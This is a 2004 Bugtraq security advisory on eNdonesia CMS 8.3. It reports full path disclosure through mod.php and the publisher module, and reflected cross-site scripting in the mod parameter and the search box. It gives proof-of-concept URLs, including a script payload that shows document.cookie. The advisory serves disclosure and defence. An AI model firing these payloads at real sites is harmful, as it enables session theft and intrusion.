[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20040804040014.25417.qmail@www.securityfocus.com>
Date: 4 Aug 2004 04:00:14 -0000
From: ahmad muammar <y3dips@...o.or.id>
To: bugtraq@...urityfocus.com
Subject: Multiple vulnerabilities in eNdonesia CMS
ECHO_ADV_02$2004
---------------------------------------------------------------------------
Multiple vulnerabilities in eNdonesia CMS
---------------------------------------------------------------------------
Author: y3dips
Date: August, 2th 2004
Location: Indonesia, Jakarta
Web: http://echo.or.id/adv/adv02-y3dips-2004.txt
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
eNdonesia is a freeware content management system, written in php by Nurcholis.
Homepage: http://www.endonesia.net/
download at : http://www.sourceforge.net/projects/endonesia
Version :
tested on endonesia 8.3
not tested on other/older version but it is possible be the same
---------------------------------------------------------------------------
Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
A. Full path disclosure:
A1. - all scripts in "mod.php" files are not protected against direct access
Example:
http://localhost/endon/mod.php?mod=1
... and we will see standard php error messages, revealing full path to script:
Warning: main(./mod/1/index.php): failed to open stream: \
No such file or directory in /var/www/html/endon/mod.php on line 3
Warning: main(): Failed opening './mod/1/index.php' for inclusion \
(include_path='.:/usr/share/pear') in /var/www/html/endon/mod.php on line 3
A2.
Example:
http://localhost/endon/mod.php?mod=publisher&op=viewcat&cid=%3Cb%3Etest%3C/b%3
... and we will see standard mysql error messages, revealing full path to script
in module because input character:
http://localhost/endon/mod.php?mod=publisher&op=viewcat&cid=[your chararter]
warning :
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource
in /var/www/html/endon/mod/publisher/publisher.php on line 101
B. Cross-site scripting aka XSS:
eNdonesia has built-in filtering against XSS exploits, so additional measures must be used
for successful cross-site scripting.
B1 - XSS through unsanitaized user submitted variable in mod.php
http://localhost/endon/mod.php?mod=[XSS Code here]publisher&op=viewcat&cid=1
POC : http://localhost/endon/mod.php?mod=%3Ch1%3Etest-nih-publisher&op=viewcat&cid=dudul
then the warning is
Warning: main(./mod/
test
Epublisher/index.php): failed to open stream: \
No such file or directory in /var/www/html/endon/mod.php on line 3 .
..... with "test" in <h1> format
B2. Session ID at search box
http://localhost/endon/mod.php?mod=publisher&op=search&query=
POC :
http://localhost/endon/mod.php?mod=publisher&op=search&query=%3Cscript%3Ealert(document.cookie)%3C/script%3E
or in search box, input <script>alert(document.cookie)</script>
---------------------------------------------------------------------------
The fix:
~~~~~~~~
Vendor not contacted yet
but i ll post it to them later
---------------------------------------------------------------------------
Shoutz:
~~~~~~~
~ echo|staff (m0by, the_day, comex, z3r0byt3, K-159, c-a-s-e, S`to)
~ newbie_hacker@...oogroups.com ,
~ #e-c-h-o@...NET
---------------------------------------------------------------------------
Contact:
~~~~~~~~
y3dips || echo|staff || y3dips[at]phreaker[dot]net
Homepage: http://y3dips.echo.or.id/
------------------------------[ EOF ]--------------------------------------
Powered by blists - more mailing lists